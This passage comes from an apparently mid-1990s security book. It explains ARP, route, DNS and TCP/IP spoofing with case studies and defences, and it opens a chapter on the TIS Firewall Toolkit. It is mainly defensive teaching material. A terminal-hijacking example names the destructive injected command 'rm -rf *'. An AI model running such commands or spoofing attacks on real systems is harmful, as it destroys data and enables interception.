to accept the routes advertised by the Computer Science router, cutting off a way for remote
machines to send datagrams to machines on subnets not directly attached to the Central
Computing router
...
Such a use of intermediaries is
known as a “proxy” arrangement
...
A simple proxy Web server in the Computer Science machine room
will reduce this awkwardness
...
The Central Computing router will
make ARP requests to determine where to send the datagrams it is forwarding to a Computer
Science segment it is not connected to
...
The datagrams will be delivered to the
Computer Science router for forwarding, while the Central Computing router is led to believe
it delivered the datagram to its destination
...


Detecting an ARP Spoof
Unless you have the capability to introduce the kind of hardware barriers described previously,
preventing an ARP spoof is probably not practical
...
When an anomaly is detected in the ARP
protocol it may be legitimate, accidental, or a security breach
...
This chapter limits its discussion to mechanisms; it
is up to the reader to decide what policies and procedures to implement after detection of a
potentially serious problem takes place
...
At the host level, an ordinary host may
attempt to detect another machine using its own IP address either by passively examining

p1vPHCP/nhb1

Internet Security Pro Ref 577-7 Gina 1-27-96 CH06 LP#3

IP Spoofing and Sniffing

network broadcasts or by actively probing for such a machine
...
Finally, at the network level, a
machine under control of the network administrator may examine all ARP requests and replies
to check for anomalies indicating an ARP spoof is underway
...
It only needs to check the target
address to see if the target IP address matches its own IP address
...
However, once the operating system has been interrupted, it takes little extra work to
check to see if the sender IP address matches its own
...
Such an anomaly certainly indicates a serious configuration problem and may be the result of a simplistic ARP spoof in which the attacker simply
reset the IP address of the machine being used in the attack
...


Host-Level Active Detection
Another precaution to detect ARP spoofs is to arrange for hosts to send out an ARP request for
their own IP address, both on system startup and periodically thereafter
...
Actively querying ARP with one’s own IP address will catch
inadvertent IP address misconfigurations as well as an attacker who is simply using an ordinary
operating system with a deliberately misassigned IP address
...

In particular, a technically adept attacker might modify the operating system of the machine
being used to mount the attack
...
The availability of such sophisticated software may seem
unlikely even to an advanced computer user
...
It is not particularly difficult for a determined attacker to obtain such an
operating system
...


Server-Level Detection
Alternatively, a more elaborate precaution would be to verify an ARP reply by making an
RARP request for the hardware address contained in the reply
...
RARP requests
ask the question “What is the IP address associated with the hardware address I have here?”

p1vPHCP/nhb1

Internet Security Pro Ref 577-7 Gina 1-27-96 CH06 LP#3

289

290

Part II: Gaining Access and Securing the Gateway

Traditionally, the primary use of RARP is by diskless machines with no permanent modifiable
memory
...
RARP relies on
one or more RARP servers that maintain a database of hardware addresses and the corresponding IP addresses
...


Note The basic idea of checking the validity of the results to a query by making an
inverse query is generically useful
...
Suppose you use one value, X, as a key for a query
with the database indexed on one field and get a second value, Y, from a second
field as a result
...
If you do not, then
something is wrong with the database or its searching mechanism
...
When a
host detects that it is being impersonated by another machine, it may be able to report the fact
to its user, but once an attack is underway it may be unable to inform the network administrator who is presumably using another machine
...
The
active querying precaution is well-known and is a common textbook exercise
...
If
that is your situation, you probably want a software detection system that can be deployed on a
single machine on your network
...


Network-Level Detection via Periodic Polling
By periodically inspecting the ARP caches on machines, you should be able to detect changes
in the IP address to hardware address association on those machines
...
At the very least, such an inspection can probably be
done manually on most hosts
...
A program on
that machine could look for inconsistencies between hosts, changes from previous reports, and
conflicts between reported ARP cache information and the information in the manually
maintained database—any of these may indicate a problem
...
One such
mechanism is SNMP—the Simple Network Management Protocol
...
Virtually all current systems provide bundled SNMP agents
...
Finding good SNMP management software may be
difficult and expensive to purchase and deploy
...
The standard SNMP MIB-I contains the address translation group that
contains a single table named “at
...
The address translation group
has to be deprecated in SNMP MIB-II to allow for greater flexibility because IP is now no
longer the only protocol being controlled with SNMP
...
ipNetToMediaTable
...
Many SNMPv1 agents are configured with a community name of “public” to
give a read-only view of all of the objects in the MIB
...
A sniffer could determine the
community name for the writable view and use it to alter the state of the device
being controlled by the agent
...
A program on the promiscuous interface’s host can inspect
every packet sent on the network and monitor the network on a continuous basis, not just
when troubleshooting
...
A network monitor can detect a change in
the association between a hardware address and an IP address and report such changes immediately when they occur
...
(Brouters are devices that are combination
bridges and routers—a hybrid device such as the Cisco AGS that is often found in
multiprotocol networks where non-routable protocols must be bridged
...
Also, they all typically come with SNMP agents that can send a trap message to the
network operations center to report the detection of a potential ARP spoof
...
However, none of these devices may be successful in
doing so if the spoofer is masquerading as the network operations center itself
...

SNMP agents supporting the RMON protocol (as described in RFC 1271) are designed to do
low-level monitoring involving sniffing
...
Locating the RMON
agent on devices that connect to more than one segment will reduce the number of agents that
need to be fielded
...
However, building your own
system using freeware packages such as BTNG and Tricklet provides an alternative
to expensive commercial packages
...


BTNG (Beholder, The Next Generation) is an RMON agent available from the Delft
University of Technology in the Netherlands via anonymous FTP
...
The two systems are
integrated and are a good place to start to put together an ARP spoofing detection
system in a network large enough to require SNMP management
...
Such monitoring software includes “arpmon” and “netlog” from Ohio State
University
...
Another program to do this kind of monitoring is ARPWatch, which
is more narrowly focused on the issue of looking for anomalous behavior in the ARP protocol
...
net
...
edu:/pub/networking
...

s netlog is available from ftp
...
ohio-state
...

s ARPWatch 1
...
The most
recent version can be obtained via anonymous FTP to ftp
...
lbl
...


p1vPHCP/nhb1

Internet Security Pro Ref 577-7 Gina 1-27-96 CH06 LP#3

IP Spoofing and Sniffing

Spoofing the IP Routing System
On the Internet, every machine that is active at the network layer takes part in routing
decisions (bridges and repeaters are only active at lower layers)
...
The essential routing decision is “Where should a datagram with a particular IP
destination address be sent?” If the destination address matches the (sub)network address of
(one of ) the machine’s interface(s), then the machine routes the datagram directly to the
destination hardware address
...

Each machine keeps a routing table containing a list of destination (sub)networks and the IP
address of the router used to forward to that (sub)network
...


How Routers and Route Spoofing Work
Route spoofing can take various forms, all of which involve getting Internet machines to send
routed IP datagrams somewhere other than where they should
...
Like ARP spoofing, route spoofing can result in a denial of
service attack—datagrams do not go to the machine for which they are intended with the
result that a machine appears to be unable to communicate with the network
...
In the process, they can filter through the network traffic,
possibly making modifications to it, creating the illusion of a properly working network
...
If the default router is not the best choice, it sends the datagram back over the same
network from which the datagram originated to a different router
...
ICMP includes a variety of types of messages
...

A redirect message essentially says “it would be best to send datagrams to a router with IP
address W
...
Y
...
B
...
D rather than using me as your
router for that destination
...
Note that the datagram did not
become lost and does not need to be re-sent because the router sending the ICMP redirect has
already forwarded the datagram to the appropriate router
...

Turning off ICMP redirect processing is one way of avoiding the simplest of route spoofing

p1vPHCP/nhb1

Internet Security Pro Ref 577-7 Gina 1-27-96 CH06 LP#3

293

294

Part II: Gaining Access and Securing the Gateway

techniques—sending illegitimate ICMP redirect messages
...
At the very least, a check hopefully is
made to see that the message coming from an IP address corresponds to a known router
...
The first
router on the list is the default router; the next router on the list becomes the default
router in case the first one appears to be down
...
This prevents an ARP spoof in which a
machine masquerades as one of the routers
...

If a machine sends ICMP redirect messages to another machine in the network it could cause
the other machine to have an invalid routing table
...
A much more serious situation would arise if a machine poses as a
router to intercept IP datagrams to some or all destination networks
...
Otherwise, it could simply forward the datagrams to the legitimate router
over the same network interface on which they arrived (without the usual ICMP redirect to
point back to the legitimate router)
...
Doing so may be difficult unless your TCP/IP software is configurable
...
Many Unix
System V machines accept a packet filter with no recompilation or relinking of the kernel
...

TAP is an example of a packet filter used for monitoring
...


An alternative is to validate ICMP redirect messages, such as checking that the ICMP redirect
is from a router you are currently using
...
The ICMP redirect should contain the header of the IP datagram that was forwarded
...
However,
such a check may add to your confidence in the validity of the redirect message and may be
easier to do than the other checks because neither the routing table nor the ARP cache needs to
be consulted
...
A routing
protocol used on an ordinary host is probably not worth the effort because it will probably take
more work than processing ICMP redirects unless multiple routers are available on the
network
...
Of course, routers need routing protocols to exchange routing information with
peer routers unless you use manually configured routing tables
...

Two categorizations of protocols used to describe routing protocols: one categorization
separates protocols by intended use; the other categorization separates protocols by the kind of
algorithm used to determine which router to use for a given destination network
...

Internal routing protocols are used between routers that are within the same corporate network
and external routing protocols are used between routers that belong to different companies
...

The external protocols are much more limited in the information they share
...
” An autonomous
system consists of one or more networks that may share detailed and complete routing
information with each other, but do not share complete routing information with other
autonomous systems
...
Within an autonomous system, the routers have information
about how the networks are divided into subnets and about all routes to other autonomous
systems
...
One company may also want to keep its network(s) from carrying
datagrams from another company to third parties
...
External protocols are typically only used on “border” routers
that connect autonomous systems to each other
...

At times, companies with strategic alliances will have border routers connecting their networks
to bypass the ISP for IP datagrams that have their source in one company’s network and their

p1vPHCP/nhb1

Internet Security Pro Ref 577-7 Gina 1-27-96 CH06 LP#3

295

296

Part II: Gaining Access and Securing the Gateway

destination in the other company’s network
...
Today’s strategic partner may be
tomorrow’s primary competitor and you have no control over the level of security provided
within another autonomous region
...

Another category of routing protocols tries to find the best route through the Internet
...
Vector-distance routing protocols (also called Bellman-Ford protocols)
only require that each router be aware of the routers it can deliver to directly
...
In link-state routing
protocols, each router actively tests the status of its direct links to other routers, propagates
change information about the status of such routers to all such routers, and uses an algorithm
to compute the best path to all destinations from itself
...

The most commonly used routing protocol is a vector-distance protocol called simply the
Routing Information Protocol (RIP)
...
According to some,
RIP was introduced to IP by a graduate student at Berkeley who produced the first implementation overnight when he realized the IP would need some form of routing protocol
...
Ordinary hosts participate in the protocol passively by
listening to UDP broadcasts on port 520 to get information from the routing tables for each
router on their network
...

Routers participate in protocol actively by broadcasting their entire routing table every 30
seconds
...
The hop count is the number of routers between the router making the broadcast and
the destination network
...

A router using exactly one intermediary router to reach a network would advertise a hop count
of one to that network
...
Using such a low value eliminates routing loops
quickly, but limits RIP to networks with at most 16 routers between any two hosts
...
On a typical Unix system, port 520 is numbered so
low that special privileges are required to access it
...
A particularly serious
situation arises if routers are passive participants in RIP, using it as an internal routing
protocol
...


A Case Study of a RIP-Based Route Spoof
To illustrate such an attack, assume everyone at the university is well-intentioned and the
network seems to be normal
...
The university has so many individual
systems, however, that some departments, such as Computer Science, have a separate system
administration staff
...
Presumably, the Computer Science staff has enough common sense not to modify
the wiring installed by Central Computing
...

As you can imagine, Computer Science came up with the brilliant idea of installing a network
that does not use the wiring installed and maintained by Centralized Computing
...
Network administration does not seem that hard and does not seem particularly
distinct from system administration, so the Computer Science staff takes the plunge and tries
to do it themselves
...

The problem comes when the Computer Science head points out that it would really be nice if
the new Computer Science network would communicate with the Central Computing
network
...
The Computer Science staff
can control the new router and use RIP to advertise connectivity between the Central Computing network and the Computer Science network
...

At first, the system works fine
...
Then, one day, a departmental staff member
decides to reconfigure the workstation and makes a small mistake
...
His error
prevents machines on the Computer Science network from being able to send IP datagrams to
the workstation/router because it no longer responds to their ARP requests
...

This mistake, however, causes much more severe problems than anyone could have predicted
...
This subnet is really in a building on the far side of
campus with several Central Computing routers in between Computer Science and the router
in building with this Central Computing subnet
...
The
nearest Central Computing router decides that it can get to this subnet with a hop count of
one via the Computer Science workstation/router instead of using the next Central Computing
router that says it has a hop count of three to the subnet in question
...

Within minutes, a large portion of the network can’t communicate with the Computer Science
network or the Central Computing subnet associated with the misconfigured IP address
...

Complaints are registered with Central Computing from both directions: Computer Science
complains its connection to Central Computing is down and the users in the building across
campus complain that their link to the multiuser computers and the Internet is down
...
The problem was eventually discovered when the routing tables of the routers
were examined
...
Computer
Science fixed the address on its router and solved the other half
...
Afterward, Central Computing figures out that
someone might do such a thing on purpose, compromising the stability and security of the
network
...

s Use passive RIP carefully on routers
...
The Central Computing routers are still active participants in RIP, broadcasting routing information to hosts
every 30 seconds
...
However, individual hosts are still susceptible to attack
via RIP if they are passive participants in RIP
...
To be
secure, the passive participant in RIP must only use RIP information from trustworthy sources
...
A replacement for the standard RIP daemon is GateD, developed at Carnegie-Mellon University
(CMU), This program consults a configuration file when it starts
...

The GateD software is no longer available directly from CMU
...
The most recent version may
be obtained from the World Wide Web at http://www
...
merit
...
gated
...
edu in the directory /net-research/gated
...
Each router is configured to restrict its sources of trusted RIP information to trusted routers
...

Central Computing in the preceding example still needs to decide if it will configure the router
closest to Computer Science to accept the RIP information sent to it from non-Central
Computing routers
...
The router, unless specially configured not to do so, will
proceed to forward these datagrams to their destinations
...
The routing
table for the destination host will probably have a default router to use in such a case and send
the IP datagram containing the reply to it
...
If it does not have a default router to use for such a case, it will send an ICMP message
back to the host that was attempting to send back the reply and discard the IP datagram
containing the reply
...
In any case, the reply is
dropped by a router, an ICMP message goes to the machine that sent the reply, and no reply
reaches the Computer Science network
...
In particular it can exchange data between the Computer Science network and the hosts
on the Central Computing subnet directly connected to the Computer Science router
...

To give Computer Science access to the rest of the network, Central Computing has several
options
...
This is simple, neat, and clean
...

A second option is to have the Central Computing router pay attention to RIP broadcasts
from the Computer Science router but limit the information extracted from the broadcast
...
Even if the Central Computing
routers use a link-state protocol among themselves, the router nearest to Computer Science can
use a hybrid approach to manage the oddball workstation/router that is not participating in the
link-state protocol
...
Each of them has a “border” router with a direct connection
to the other border router
...
An external routing protocol, such as EGP, is used to exchange
routing information between the two border routers
...
IBM’s border router inserts these routes in its routing table
...

Suppose Apple were to use EGP (the External Gateway Protocol—a name that makes it sound
like there is no other alternative), a classic external routing protocol, to advertise a route to
another company’s research network, Intel’s, for example, and IBM normally routed IP traffic
through an ISP
...
If all goes as it would normally, the IBM router sees a route to Intel through one of
Apple’s border routers
...

Now, Apple is getting all of the IP traffic sent from IBM to Intel
...
On the other hand, the
Apple border router could be configured to discard such datagrams and Apple would have

p1vPHCP/nhb1

Internet Security Pro Ref 577-7 Gina 1-27-96 CH06 LP#3

IP Spoofing and Sniffing

succeeded in a denial of service attack
...
Alternatively, a sniffer on Apple’s internal network would now be able to
intercept traffic from IBM to Intel for industrial espionage purposes
...
A database of network
addresses and their associated autonomous system numbers such as the one provided by
InterNIC would reveal to IBM’s border router that the Intel network has an autonomous
system number different from the one Apple was claiming it had when making the EGP
advertisement
...


Note EGP is no longer considered state-of-the-art in external routing protocols, but the
principle remains the same for all external routing protocols
...
DNS names are easier to remember and easier for most people to work with
than dotted decimal IP addresses
...
Unfortunately, the use of names involves yet
another layer of software, introducing another point of vulnerability for the security of the
systems
...
When a client connects to a named host, the client needs to
convert the name to an address
...
Because virtually all
systems place trust in name server, all of the special precautions described previously in this
chapter to protect trust should be used to protect that trust
...
226
...
102—the DNS name server used by my machine
...

Similarly, when a host needs to convert an address to a name it sends a reverse lookup query to
a DNS name server
...
However, the
server must rely on the DNS system to perform a reverse lookup query to determine the name
of the prospective client
...
If a DNS name
server is coerced into providing false data, the security of the system can become compromised
...
To help you understand its structure, think of the DNS system
as a distributed database consisting of records with three fields: name, address, and record type
...
The database is not centralized because it would be
impractical to do so—from a technical standpoint and from an administrative standpoint
...
Administratively, this centralized database setup
would be horribly awkward to change because thousands of network administrators would
need to be checked for authenticity and privileges each time one of them makes a change
...

Each domain is administered independently of each other domain
...
Each subdomain is responsible for a subset of the names of the whole domain
...
The term “subdomain” is a relative
term between a domain and a domain that has control over a piece of the domain
...
Two types of non-local replies are possible: iterative or recursive
...
If
the client asks for iterative resolution, the name server simply returns the address of the name
server it would have forwarded the request to and lets the client query that name server
directly
...
When a name server makes an
authoritative response, either to an ordinary client host or another name server, the authoritative response includes a “time to live,” which amounts to a claim that the response will
continue to be valid for a certain amount of time
...

Some kinds of DNS replies will clearly lead to a follow-up query
...
Hence, a DNS reply not only has
sections for specifying the question, answer, and authority of the answer, but also has a section
for additional information
...


How DNS Spoofing Can Happen
Suppose a name server somewhere on the Internet has been compromised by a security attack
or is being controlled by an intruder
...
The authoritative
responses can direct clients looking up the names of servers to connect to servers under the
control of the attacker rather than the legitimate servers
...
Within the DNS system, absolutely nothing can be done about
such a direct attack
...
That is, a server queries the DNS
system with the IP address of a prospective client via a reverse lookup and receives the DNS
name(s) of the prospective client
...
Cross-checking has become a standard technique
with TCP wrapper systems
...
Because these tables
are kept in separate files, they may also be kept on separate name servers
...
Because of potential abuses of the efficiency mechanisms in DNS, the name server may
not discover the inconsistency
...
In particular, when a name server makes a non-authoritative
response to an iterative query, it responds with the name of a name server more likely to be

p1vPHCP/nhb1

Internet Security Pro Ref 577-7 Gina 1-27-96 CH06 LP#3

303

304

Part II: Gaining Access and Securing the Gateway

authoritative than itself
...
In such cases, a check on authoritativeness should, in principle, detect the attack
...
One must then ask
the name server at that address for the address of the name server that is authoritative for the
next component of the DNS name and so on
...
Also, it does not help if an
authoritative name server has become compromised; it only detects invalid claims to authority
...
The
DNS standards require that data for each domain be replicated on separate computers with no
common point of failure, meaning that the name servers with the duplicated data must not be
attached to the same network or obtain electrical power from a common source
...

For this reason, it might seem that you could poll all authoritative name servers when making a
query to look for a discrepancy
...
The secondary name servers simply
make a copy of the data in the primary on a periodic basis after the serial number on the data
for a domain has changed
...
Meanwhile, inconsistencies may simply indicate that the secondary has not copied
legitimate changes to the data on the primary
...

For example, suppose one query places the name of a domain and the name of its name server
in the cache as well as the name of the name server and its address
...

If either of these cached records is invalid, all subsequent queries for this domain will be
directed to the wrong place
...
A
compromised name server may cause errors in the caches of uncompromised name servers that
cause the uncompromised name server to provide invalid data to its clients
...
Thus, it may provide a perfectly valid response to the

p1vPHCP/nhb1

Internet Security Pro Ref 577-7 Gina 1-27-96 CH06 LP#3

IP Spoofing and Sniffing

original query, but arbitrary misinformation provided in the additional information section of
the response will be cached by a name server that queries it
...
A compromised name server might
provide an invalid response, which would seem to make the prospective client legitimate
...
If the server makes an
iterative query instead, it will not cause immediate corruption of its name server’s cache when
the compromised name server is not directly interacting with the local name server, but any
client of the local name server may trigger a request that corrupts the cache of the local name
server
...
Their company runs a name
server to support their DNS domain, widget
...
Their workstations consult this name server
when looking up the IP addresses of outside networks
...
edu domain
...
com name server that forwards the query to the
podunk
...
The widget
...
edu and
supplies the requested IP address information to Mary’s Web browser
...
edu name server has been taken over by a malicious college
student
...
com name server, additional information
fields are attached
...
sf
...
us,” the DNS name for the
Well—an online service provider located in San Francisco
...

A little while later, Frank decides to telnet to his account on well
...
ca
...
When he types in his username and password, there
is a brief pause, he is presented with his usual menus, and continues his work
...
com
name server
...
com name server found the entry for well
...
ca
...
Frank’s machine established a
connection with the college student’s machine and it began the classic Trojan horse routine
...

It then turned around and used a modified version of telnet to connect to well
...
ca
...
The Trojan
horse created the illusion that Frank was directly connected to the Well and gave the college
student the password for Frank’s account on the Well
...
Now
examine an active attack exploiting this same weakness, and with an attacker who targets a
specific individual
...

Suppose Frank has set up his account at Widgets, Inc
...
sf
...
us) without being required to supply a password
...

The malicious college student sends a mail message to a mail server at Widgets, Inc
...
The mail server performs a DNS lookup for podunk
...

The compromised name server supplies additional information in its reply that indicates not
only that well
...
ca
...
sf
...
us
...

His machine starts up the rlogin daemon
...
com name server, looking for
the name that corresponds to the IP address of the college student’s machine
...
com
name server finds this information in its cache and replies that the IP address corresponds to
the name “well
...
ca
...
” The college student gains access to Frank’s account at Widgets, Inc
...
The logs on the Well show that Frank was not logged in, however, which would tip
Frank off if he ever cross-checked them with his own logs
...
Do not use rlogin to allow access from
machines that do not have authoritative entries in the local name server database
...
A DNS spoof will subvert this check
...
However, DNS style
naming is such a part of the way users and system administrators work that it is unthinkable to
do without it
...
Every place an IP address is used in place of a DNS
name is one less place the system is vulnerable to DNS spoofing
...
The API is the same whether DNS is being

p1vPHCP/nhb1

Internet Security Pro Ref 577-7 Gina 1-27-96 CH06 LP#3

IP Spoofing and Sniffing

used to implement these mappings or some other standard
...
The DNS is
consulted by these implementations of the API only if the local sources fail to give conclusive
results
...
In particular, many modern
operating systems use dynamic linking or shared libraries to reduce the size of executable files
...


Note When using SunOS 4
...
When I wanted my programs to use the DNS system instead, I had
to get source code to implement those functions using the DNS, compile it, and
include it in the shared C system library
...
If a client on one machine triggers the corruption of the cache on
one name server, the use of multiple name servers reduces the likelihood of widespread
damage
...

Other hosts can use a different name server that will not have its cache corrupted as long as the
name server on the timeshared host does not forward recursive requests to the other name
server
...
The technique outlined here limits damage from a
passive attacker waiting for victims to come along
...
Placing
such a limitation on a name server does not make it useful for serving requests to the outside
world but makes it more secure for internal use
...
In the first case study, Mary’s cache would have been
corrupted but it would not have caused problems for Frank
...


p1vPHCP/nhb1

Internet Security Pro Ref 577-7 Gina 1-27-96 CH06 LP#3

307

308

Part II: Gaining Access and Securing the Gateway

The use of local name servers on workstations also may reduce total network traffic and aids in
fault tolerance
...


Warning You are still at risk of a DNS spoof if local name servers on workstations are
configured to process queries recursively when they consult the network wide name
server
...
In either case, a corrupted network-wide name server cache
will affect the workstations
...
Local name servers are
also subject to cache corruption
...
You should be sure local name servers only process queries
from the local machine to prevent an active attacker from directly contaminating
their cache
...


You might also modify local name server software to be more selective about the information it
caches
...
Selective caching by
doing such things as ignoring information in the additional information section of DNS
replies will certainly have an adverse impact on efficiency
...

RFC 1788 proposes an alternative to DNS reverse lookups: all machines would respond to a
new ICMP message requesting the set of names that correspond to the IP address on which the
ICMP message was received
...
Although this proposal aims to increase the security of DNS, it is not clear how it
would have helped in the case study involving Frank and Mary described earlier
...

The simplest thing a name server administrator can do to prevent a DNS spoof from corrupting the name server cache is to have the most recent version of the operating system’s DNS
name server software
...
Newer versions of BIND incorporate modifications made with a more security conscious attitude than older versions
...
dns
...
dnsrd/servers
...


p1vPHCP/nhb1

Internet Security Pro Ref 577-7 Gina 1-27-96 CH06 LP#3

IP Spoofing and Sniffing

Tip

For a more detailed treatment of the security weaknesses of the DNS system, see the
paper “Countering Abuses of Name-based Authentication” by Christoph Schuba and
Eugene Spafford of the COAST security lab at Purdue University
...

COAST has a site on the World Wide Web at http://www
...
purdue
...
html
...
It is possible for an attacker’s machine to spoof by
sending IP datagrams that have an IP source address belonging to another machine
...

The attacker’s machine can send IP datagrams with a forged source address to other machines
while the machine legitimately possessing that IP address is active
...
The other machines will accept these datagrams
as coming from the legitimate holder of the IP source address of these forged datagrams
...

Typically, IP-based application protocols have some notion of a session with some information
exchanged at startup, which is used to identify the two parties to each another during the
active part of the session
...
If a sniffer is being used by the attacker, it becomes easy
for the attacker to pose as either party
...
After this exchange, the client will be
able to open and read or write files on the server by making requests of the NFS daemon
...
If the attacker sends out
an appropriately formatted UDP datagram, the server will process an NFS request and send
the results back to the client
...
If the request was a read request and the attacker has a sniffer between the
client and server, the attacker will succeed in finding out some of the contents of the disk via
the sniffer
...
In the NFS
scenario described earlier, you were using UDP and assumed the attacker had a sniffer to
obtain the credentials that allowed acceptance of the request as valid
...
If you can
rule out an attacker having a sniffer between the client and the server, the attacker would be
unable to obtain the needed credentials
...


p1vPHCP/nhb1

Internet Security Pro Ref 577-7 Gina 1-27-96 CH06 LP#3

309

310

Part II: Gaining Access and Securing the Gateway

Introduction to TCP/IP End-to-End Handshaking
To understand how an attacker might be able to send datagrams accepted as valid, you need to
understand the information exchanged between the parties of a TCP connection
...
Initially, one
party is passively waiting for the establishment of a connection
...
” The passive party is typically a server
...
The active party is typically a client
...
This
discussion refers to the parties as client and server merely to be more suggestive of the typical
roles they will play later
...
SYN stands for
“synchronize” and refers to the synchronization of initial sequence numbers
...
Every TCP
header contains a sequence number field corresponding to the sequence number in the first
data byte of the field
...

Randomness of initial sequence number is important for handling the situation when a
connection is established, the machine on one side crashes, and then attempts to reestablish a
connection
...
TCP only sets the SYN flag when the connection is started
...
ACK stands for “acknowledgment
...
The ACK flag lets the client know that it
received the initial sequence number
...

To complete the connection, the client responds back to the server with a TCP header that
has the ACK flag set
...
Understanding the sequence of events with SYN and ACK flags during the
establishment of a connection is also important when configuring firewalls (see Chapter 7,
“How to Build a Firewall,” for more information)
...
The
other party will occasionally send back a TCP/IP datagram with the TCP header having the
ACK flag set to let the sender know that the data arrived
...
TCP
transmits the amount of available room in the window field of the TCP header in each
datagram sent to inform the sender how much more data may be sent before the receive buffer
fills
...
The acknowledgment number specifies the lowest sequence number of
a data byte that it expects to receive
...

Occasionally, IP datagrams will arrive out of order
...
When the expected datagram arrives, the receiver may acknowledge both sets of TCP data at once
...


Forged TCP/IP Datagrams
To successfully forge a TCP/IP datagram that will be accepted as part on an existing connection, an attacker only needs to estimate the sequence number to be assigned to the next data
byte to be sent by the legitimate sender
...

If the attacker knows or successfully guesses the exact value of the next sequence number of the
next byte being sent, the attacker can forge a TCP/IP datagram containing data that will be
placed in the receiver’s input buffer in the next available position
...
However, if the forged datagram contains more
data, the receiver will discard only the first part
...

On the other hand, if the forged datagram arrives before the legitimate datagram, the legitimate datagram will be discarded by the receiver (at least partially)
...
However,
if the forged datagram contains enough data, the receiver may place the last part of the forged
data in its input buffer
...
Some of the data bytes
at the end of the forged datagram may have sequence numbers that do not fit in the current
window, so the receiver will discard these
...
Then, the whole forged datagram is available to the receiving program
...
An attacker could possibly be
controlling more than one machine along this path so the machine doing the sniffing need not
be the machine doing the forging
...
The only possible
place to stop the forged datagram would be at the router on the forger’s network, where a
discrepancy might be detected between the hardware address of the legitimate sender and the
forger
...
If the forging occurs on neither of the
two endpoint networks, then the opportunity to stop the forged datagram decreases
...
You can protect your network from being the source of a
forging attack by configuring these routers not to forward datagrams with impossible IP
network addresses
...
If both endpoints are on the same physical network,
an attacker might be bold enough to forge a datagram from another physical network
...
However, the router would have the
opportunity to detect the forged datagram by noting that the IP source network address
matches the IP destination network address
...


Note See the files for CERT Advisory CA:95-01 to find out more about actual attacks
based on this special case
...
However, this assumes assignment of

p1vPHCP/nhb1

Internet Security Pro Ref 577-7 Gina 1-27-96 CH06 LP#3

IP Spoofing and Sniffing

the initial sequence numbers in a completely random manner
...
If the initial sequence numbers of the two
connections are related in some way, the attacker will be able to compute the initial sequence
number of the other connection
...
This estimate added to the
initial sequence number estimates the current sequence number
...

Some TCP/IP implementations use initial sequence numbers generated by a simple random
number generator that generates numbers in a fixed order
...

Knowing that connection’s initial sequence number will provide enough information to
narrow the plausible initial sequence numbers for the connection to a very few instead of four
billion
...


Terminal Hijacking: An Example of TCP/IP Forging
Imagine the following everyday scenario at my workplace
...
The most convenient way to use these systems is to have
them start automatically
...

In fact, some of these sessions never are used after they start
...
An attacker with ordinary access to one of the timesharing systems can
easily detect the time any particular worker starts a terminal session by monitoring the set of
users on the timeshared system
...

The attacker may have received this number using a sniffer running on another host on the
network or by taking advantage of the deterministic pattern of initial sequence numbers
...
Typically, the worker types in at most a username, password, and a
command or two by this time
...

To do some real damage, the attacker simply has to insert a sequence of characters in the data
stream that correspond to a command being typed in at the command prompt
...
Putting
“rm -rf *” on the command line in Unix deletes all files in the current directory along with all
files in all subdirectories of the current directory
...

If the attacker determines the exact initial sequence number for the terminal session, the
command is executed by the timesharing system in the worker’s absence
...
Imagine the surprise the worker gets
when he or she shows up in the morning and sees this terminal window
...


Reducing the Risks of TCP/IP Spoofing
One way to reduce the threat of this sort of attack is to simply log out of all terminal sessions
before they become inactive and only start up terminal sessions when you need them
...

A second way to reduce the threat is to use an implementation of the terminal session protocol
(telnet or rlogin) that inserts extra terminal protocol data transmitted to the timesharing
machine
...

A third way to reduce the threat is to avoid the use of terminal session protocols between the
user’s desktop and the timesharing machine
...

You can also run the windowing program on the timesharing machine and use the X protocol
to have the window displayed on your desktop
...

A fourth way to reduce the threat of TCP/IP spoofing is to use an encryption-based terminal
protocol
...
If the attacker is using a sniffer, the sniffer knows the exact

p1vPHCP/nhb1

Internet Security Pro Ref 577-7 Gina 1-27-96 CH06 LP#3

IP Spoofing and Sniffing

current sequence number
...
Unless the encryption is broken, the receiver will
accept the data as valid but the command interpreter will not be able to make sense of it
...

The only way to deal with this threat completely with current standardized technology is to use
a combination approach
...
TCP/IP data must be encrypted so that unencrypted or
misencrypted data will not be confused with valid commands
...


Using Next-Generation Standard IP Encryption Technology
To stop IP address spoofing, you must use encryption on the entire data portion of an IP
datagram, including the TCP header
...
See RFCs 1825-1830
...
It encrypts the TCP header and the
TCP data, preventing sniffers from finding sequence numbers
...
Because it requires kernel modification the source code is not of general
interest; if you are interested, however, use anonymous FTP to access ftp
...
berkeley
...

An emerging standardized IP encryption technique is specified in “RFC 1825: Security
Architecture for the Internet Protocol
...
RFC 1825
specifies two parts: an authentication header (AH) and an encapsulating security payload
...
The use of the authentication
header prevents the forging of IP datagrams
...

The following RFCs detail a proposed standard authored by R
...
They were authored by Metzger, Karn, and Simpson
and published in August 1995
...
The newer RFCs are, as of this writing, still “experimental” rather
than part of a “proposed standard
...
Businesses protect themselves from
intellectual theft through patents and trademarks
...
Although
there are several ways this can be achieved, the most
prevalent is the use of a firewall
...
The concept applies
in a similar fashion to computer technology, except that often we are attempting to protect
ourselves from the fire that exists outside our “wall
...

Strictly speaking, a firewall can be defined as a collection of components that is placed between
two networks
...

s Only traffic authorized by the local security policy will be allowed to pass
...

This chapter examines the Trusted Information Systems (TIS) Firewall Toolkit, that is
provided as a consturction set for building a firewall
...


The TIS Firewall Toolkit
The Firewall Toolkit produced by Trusted Information Systems, also known as TIS, is not a
single integrated package, but a set of tools that are used to build a firewall
...
Consequently, it is difficult
to produce documentation that can be used in all situations
...
In this chapter, you will examine how to compile the TIS Toolkit, and
configure the various components that make up the kit
...


Understanding TIS
The TIS Firewall Toolkit is a collection of applications that, when properly assembled with a
security policy, forms the basis of a firewall
...
As such, the Toolkit has gained a wide following, and is in use worldwide
...
Rather, it is a set
of tools for building a number of different types of firewalls
...
As such, this chapter explains what the Toolkit is and how the underlying

p1vPHCP/nhb1

Internet Security Pro Ref 577-7

tricia 1-24-95

CH07

LP#2

319

How to Build a Firewall

technology works
...


Where to Get TIS Toolkit
The TIS Toolkit is available from the site ftp
...
com, in the directory /pub/firewalls/toolkit
...
tar
...

After you retrieve the file, it must be uncompressed and extracted from the tar archive
...
After uncompressing and extracting the archive, the directory
structure illustrated in figure 7
...

fwtk
auth
config

Figure 7
...


admin
flog

ftp-gw

netscan

http-gw
lib

portscan

netacl

progmail

plug-gw

reporting

rlogin-gw

client
gate-ftp

smap

misc

smapd
tn-gw
x-gw

server
aix-auth
ftpd
login-sh
login-ts
syslog
reg

When the files are extracted from the tar archive, the next task is to compile them
...
h and the Makefile
...

Major issues that you need to consider are the installation location of the Toolkit—defaults to
/usr/lcoal/etc—and how the library and compiler are to be configured
...
